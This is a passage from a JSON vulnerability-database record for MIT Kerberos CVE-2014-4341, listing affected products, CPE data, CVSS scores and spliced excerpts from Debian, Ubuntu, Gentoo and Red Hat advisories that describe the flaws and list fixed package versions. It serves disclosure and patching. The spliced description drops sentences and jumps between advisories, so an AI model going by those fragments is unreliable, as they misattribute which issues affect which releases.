"6.0" }, { "model": "big-ip analytics hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.3" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "big-ip psm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "aura system platform sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "big-ip gtm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip wom hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "enterprise linux desktop optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip analytics hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.0.9.8" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aura application server sip core pb16", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.1" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "kerberos", "scope": "ne", "trust": 0.3, "vendor": "mit", "version": "51.12.2" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.00" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip link controller hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip gtm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5" }, { "model": "big-ip psm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.1.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "enterprise linux desktop workstation client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.1" }, { "model": "aura messaging sp4", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "big-ip pem hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip edge gateway hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.7" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "big-ip edge gateway hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.4" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.1" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "big-ip psm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" } ], "sources": [ { "db": "BID", "id": "68909" }, { "db": "JVNDB", "id": "JVNDB-2014-003508" }, { "db": "NVD", "id": "CVE-2014-4341" }, { "db": "CNNVD", "id": "CNNVD-201407-512" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:mit:kerberos_5:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "1.12.2", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:7.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:7.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:7.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:7.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:7.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_tus:7.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_tus:7.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_tus:7.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:20:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-4341" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Greg Hudson", "sources": [ { "db": "BID", "id": "68909" } ], "trust": 0.3 }, "cve": "CVE-2014-4341", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 5.0, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2014-4341", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-4341", "trust": 1.8, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201407-512", "trust": 0.6, "value": "MEDIUM" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-003508" }, { "db": "NVD", "id": "CVE-2014-4341" }, { "db": "CNNVD", "id": "CNNVD-201407-512" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "MIT Kerberos 5 (aka krb5) before 1.12.2 allows remote attackers to cause a denial of service (buffer over-read and application crash) by injecting invalid tokens into a GSSAPI application session. MIT Kerberos 5 is prone to a remote denial-of-service vulnerability. \nAttackers can exploit this issue to cause a program to crash, resulting in denial-of-service conditions. \nVersions prior to Kerberos 1.12.2 are vulnerable. \n\nCVE-2014-4343\n\n An unauthenticated remote attacker with the ability to spoof packets\n appearing to be from a GSSAPI acceptor can cause a double-free\n condition in GSSAPI initiators (clients) which are using the SPNEGO\n mechanism, by returning a different underlying mechanism than was\n proposed by the initiator. \n\nCVE-2014-4344\n\n An unauthenticated or partially authenticated remote attacker can\n cause a NULL dereference and application crash during a SPNEGO\n negotiation by sending an empty token as the second or later context\n token from initiator to acceptor. \n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.10.1+dfsg-5+deb7u2. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.12.1+dfsg-7. ==========================================================================\nUbuntu Security Notice USN-2310-1\nAugust 11, 2014\n\nkrb5 vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in Kerberos. This issue only affected Ubuntu\n12.04 LTS. This\nissue only affected Ubuntu 10.04 LTS and Ubuntu 12.04 LTS. This issue only affected\nUbuntu 10.04 LTS and Ubuntu 12.04 LTS. \nThis issue only affected Ubuntu 10.04 LTS and Ubuntu 12.04 LTS. \n(CVE-2014-4344)\n\nTomas Kuthan and Greg Hudson discovered that the Kerberos kadmind daemon\nincorrectly handled buffers when used with the LDAP backend. (CVE-2014-4345)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 LTS:\n krb5-admin-server 1.12+dfsg-2ubuntu4.2\n krb5-kdc 1.12+dfsg-2ubuntu4.2\n krb5-kdc-ldap 1.12+dfsg-2ubuntu4.2\n krb5-otp 1.12+dfsg-2ubuntu4.2\n krb5-pkinit 1.12+dfsg-2ubuntu4.2\n krb5-user 1.12+dfsg-2ubuntu4.2\n libgssapi-krb5-2 1.12+dfsg-2ubuntu4.2\n libgssrpc4 1.12+dfsg-2ubuntu4.2\n libk5crypto3 1.12+dfsg-2ubuntu4.2\n libkadm5clnt-mit9 1.12+dfsg-2ubuntu4.2\n libkadm5srv-mit9 1.12+dfsg-2ubuntu4.2\n libkdb5-7 1.12+dfsg-2ubuntu4.2\n libkrad0 1.12+dfsg-2ubuntu4.2\n libkrb5-3 1.12+dfsg-2ubuntu4.2\n libkrb5support0 1.12+dfsg-2ubuntu4.2\n\nUbuntu 12.04 LTS:\n krb5-admin-server 1.10+dfsg~beta1-2ubuntu0.5\n krb5-kdc 1.10+dfsg~beta1-2ubuntu0.5\n krb5-kdc-ldap 1.10+dfsg~beta1-2ubuntu0.5\n krb5-pkinit 1.10+dfsg~beta1-2ubuntu0.5\n krb5-user 1.10+dfsg~beta1-2ubuntu0.5\n libgssapi-krb5-2 1.10+dfsg~beta1-2ubuntu0.5\n libgssrpc4 1.10+dfsg~beta1-2ubuntu0.5\n libk5crypto3 1.10+dfsg~beta1-2ubuntu0.5\n libkadm5clnt-mit8 1.10+dfsg~beta1-2ubuntu0.5\n libkadm5srv-mit8 1.10+dfsg~beta1-2ubuntu0.5\n libkdb5-6 1.10+dfsg~beta1-2ubuntu0.5\n libkrb5-3 1.10+dfsg~beta1-2ubuntu0.5\n libkrb5support0 1.10+dfsg~beta1-2ubuntu0.5\n\nUbuntu 10.04 LTS:\n krb5-admin-server 1.8.1+dfsg-2ubuntu0.13\n krb5-kdc 1.8.1+dfsg-2ubuntu0.13\n krb5-kdc-ldap 1.8.1+dfsg-2ubuntu0.13\n krb5-pkinit 1.8.1+dfsg-2ubuntu0.13\n krb5-user 1.8.1+dfsg-2ubuntu0.13\n libgssapi-krb5-2 1.8.1+dfsg-2ubuntu0.13\n libgssrpc4 1.8.1+dfsg-2ubuntu0.13\n libk5crypto3 1.8.1+dfsg-2ubuntu0.13\n libkadm5clnt-mit7 1.8.1+dfsg-2ubuntu0.13\n libkadm5srv-mit7 1.8.1+dfsg-2ubuntu0.13\n libkdb5-4 1.8.1+dfsg-2ubuntu0.13\n libkrb5-3 1.8.1+dfsg-2ubuntu0.13\n libkrb5support0 1.8.1+dfsg-2ubuntu0.13\n\nIn general, a standard system update will make all the necessary changes. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 app-crypt/mit-krb5 \u003c 1.13 \u003e= 1.13 \n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in MIT Kerberos 5. Please\nreview the CVE identifiers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll MIT Kerberos 5 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=app-crypt/mit-krb5-1.13\"\n\nReferences\n==========\n\n[ 1 ] CVE-2014-4341\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4341\n[ 2 ] CVE-2014-4343\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4343\n[ 3 ] CVE-2014-4345\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4345\n[ 4 ] CVE-2014-5351\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-5351\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201412-53.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2014 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n. (CVE-2014-4341)\n\nThis update also fixes the following bugs:\n\n* Prior to this update, the libkrb5 library occasionally attempted to free\nalready freed memory when encrypting credentials. As a consequence, the\ncalling process terminated unexpectedly with a segmentation fault. \nWith this update, libkrb5 frees memory correctly, which allows the\ncredentials to be encrypted appropriately and thus prevents the mentioned\ncrash. (BZ#1004632)\n\n* Previously, when the krb5 client library was waiting for a response from\na server, the timeout variable in certain cases became a negative number. \nConsequently, the client could enter a loop while checking for responses. \nWith this update, the client logic has been modified and the described\nerror no longer occurs. After installing the\nupdated packages, the krb5kdc daemon will be restarted automatically. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: krb5 security, bug fix and enhancement update\nAdvisory ID: RHSA-2015:0439-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-0439.html\nIssue date: 2015-03-05\nCVE Names: CVE-2014-4341 CVE-2014-4342 CVE-2014-4343 \n CVE-2014-4344 CVE-2014-4345 CVE-2014-5352 \n CVE-2014-5353 CVE-2014-9421 CVE-2014-9422 \n CVE-2014-9423 \n=====================================================================\n\n1. Summary:\n\nUpdated krb5 packages that fix multiple security issues, several bugs, and\nadd various enhancements are now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\nKerberos is a networked authentication system which allows clients and\nservers to authenticate to each other with the help of a trusted third\nparty, the Kerberos KDC. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\n\n3. Description:\n\nA NULL pointer dereference flaw was found in the MIT Kerberos SPNEGO\nacceptor for continuation tokens. A remote, unauthenticated attacker could\nuse this flaw to crash a GSSAPI-enabled server application. (CVE-2014-4344)\n\nA buffer overflow was found in the KADM5 administration server (kadmind)\nwhen it was used with an LDAP back end for the KDC database. A remote,\nauthenticated attacker could potentially use this flaw to execute arbitrary\ncode on the system running kadmind. (CVE-2014-4345)\n\nA use-after-free flaw was found in the way the MIT Kerberos libgssapi_krb5\nlibrary processed valid context deletion tokens. An attacker able to make\nan application using the GSS-API library (libgssapi) call the\ngss_process_context_token() function could use this flaw to crash that\napplication. (CVE-2014-5352)\n\nIf kadmind were used with an LDAP back end for the KDC database, a remote,\nauthenticated attacker with the permissions to set the password policy\ncould crash kadmind by attempting to use a named ticket policy object as a\npassword policy for a principal. (CVE-2014-5353)\n\nA double-free flaw was found in the way MIT Kerberos handled invalid\nExternal Data Representation (XDR) data. An authenticated user could use\nthis flaw to crash the MIT Kerberos administration server (kadmind), or\nother applications using Kerberos libraries, using specially crafted XDR\npackets. (CVE-2014-9421)\n\nIt was found that the MIT Kerberos administration server (kadmind)\nincorrectly accepted certain authentication requests for two-component\nserver principal names. A remote attacker able to acquire a key with a\nparticularly named principal (such as \"kad/x\") could use this flaw to\nimpersonate any user to kadmind, and perform administrative actions as that\nuser. (CVE-2014-9422)\n\nAn information disclosure flaw was found in the way MIT Kerberos RPCSEC_GSS\nimplementation (libgssrpc) handled certain requests. An attacker could send\na specially crafted request to an application using libgssrpc to disclose a\nlimited portion of uninitialized memory used by that application. \n(CVE-2014-9423)\n\nTwo buffer over-read flaws were found in the way MIT Kerberos handled\ncertain requests. A remote, unauthenticated attacker able to inject packets\ninto a client or server application\u0027s GSSAPI session could use either of\nthese flaws to crash the application. An\nattacker able to spoof packets to appear as though they are from an GSSAPI\nacceptor could use this flaw to crash a client application that uses MIT\nKerberos. (CVE-2014-4343)\n\nRed Hat would like to thank the MIT Kerberos project for reporting the\nCVE-2014-5352, CVE-2014-9421, CVE-2014-9422, and CVE-2014-9423 issues. MIT\nKerberos project acknowledges Nico Williams for helping with the analysis\nof CVE-2014-5352. \n\nThe krb5 packages have been upgraded to upstream version 1.12, which\nprovides a number of bug fixes and enhancements, including:\n\n* Added plug-in interfaces for principal-to-username mapping and verifying\nauthorization to user accounts. \n\n* When communicating with a KDC over a connected TCP or HTTPS socket, the\nclient gives the KDC more time to reply before it transmits the request to\nanother server. (BZ#1049709, BZ#1127995)\n\nThis update also fixes multiple bugs, for example:\n\n* The Kerberos client library did not recognize certain exit statuses that\nthe resolver libraries could return when looking up the addresses of\nservers configured in the /etc/krb5.conf file or locating Kerberos servers\nusing DNS service location. The library could treat non-fatal return codes\nas fatal errors. Now, the library interprets the specific return codes\ncorrectly. (BZ#1084068, BZ#1109102)\n\nIn addition, this update adds various enhancements. Among others:\n\n* Added support for contacting KDCs and kpasswd servers through HTTPS\nproxies implementing the Kerberos KDC Proxy (KKDCP) protocol. (BZ#1109919)\n\n4. Solution:\n\nAll krb5 users are advised to upgrade to these updated packages, which\ncorrect these issues and add these enhancements. \n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1084068 - ipv6 address handling in krb5.conf\n1102837 - Please backport improved GSSAPI mech configuration\n1109102 - Kerberos does not handle incorrect Active Directory DNS SRV entries correctly\n1109919 - Backport https support into libkrb5\n1116180 - CVE-2014-4341 krb5: denial of service flaws when handling padding length longer than the plaintext\n1118347 - ksu non-functional, gets invalid argument copying cred cache\n1120581 - CVE-2014-4342 krb5: denial of service flaws when handling RFC 1964 tokens\n1121789 - CVE-2014-4343: use-after-free crash in SPNEGO\n1121876 - CVE-2014-4343 krb5: double-free flaw in SPNEGO initiators\n1121877 - CVE-2014-4344 krb5: NULL pointer dereference flaw in SPNEGO acceptor for continuation tokens\n1127995 - aggressive kinit timeout causes AS_REQ resent and subsequent OTP auth failure\n1128157 - CVE-2014-4345 krb5: buffer overrun in kadmind with LDAP backend (MITKRB5-SA-2014-001)\n1166012 - libkadmclnt SONAME change (8 to 9) in krb5 1.12 update\n1174543 - CVE-2014-5353 krb5: NULL pointer dereference when using a ticket policy name as a password policy name\n1179856 - CVE-2014-5352 krb5: gss_process_context_token() incorrectly frees context (MITKRB5-SA-2015-001)\n1179857 - CVE-2014-9421 krb5: kadmind doubly frees partial deserialization results (MITKRB5-SA-2015-001)\n1179861 - CVE-2014-9422 krb5: kadmind incorrectly validates server principal name (MITKRB5-SA-2015-001)\n1179863 - CVE-2014-9423 krb5: libgssrpc server applications leak uninitialized bytes (MITKRB5-SA-2015-001)\n1184629 - kinit loops on principals on unknown error\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nkrb5-1.12.2-14.el7.src.rpm\n\nx86_64:\nkrb5-debuginfo-1.12.2-14.el7.i686.rpm\nkrb5-debuginfo-1.12.2-14.el7.x86_64.rpm\nkrb5-libs-1.12.2-14.el7.i686.rpm\nkrb5-libs-1.12.2-14.el7.x86_64.rpm\nkrb5-pkinit-1.12.2-14.el7.x86_64.rpm\nkrb5-workstation-1.12.2-14.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nkrb5-debuginfo-1.12.2-14.el7.i686.rpm\nkrb5-debuginfo-1.12.2-14.el7.x86_64.rpm\nkrb5-devel-1.12.2-14.el7.i686.rpm\nkrb5-devel-1.12.2-14.el7.x86_64.rpm\nkrb5-server-1.12.2-14.el7.x86_64.rpm\nkrb5-server-ldap-1.12.2-14.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nkrb5-1.12.2-14.el7.src.rpm\n\nx86_64:\nkrb5-debuginfo-1.12.2-14.el7.i686.rpm\nkrb5-debuginfo-1.12.2-14.el7.x86_64.rpm\nkrb5-libs-1.12.2-14.el7.i686.rpm\nkrb5-libs-1.12.2-14.el7.x86_64.rpm\nkrb5-pkinit-1.12.2-14.el7.x86_64.rpm\nkrb5-workstation-1.12.2-14.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 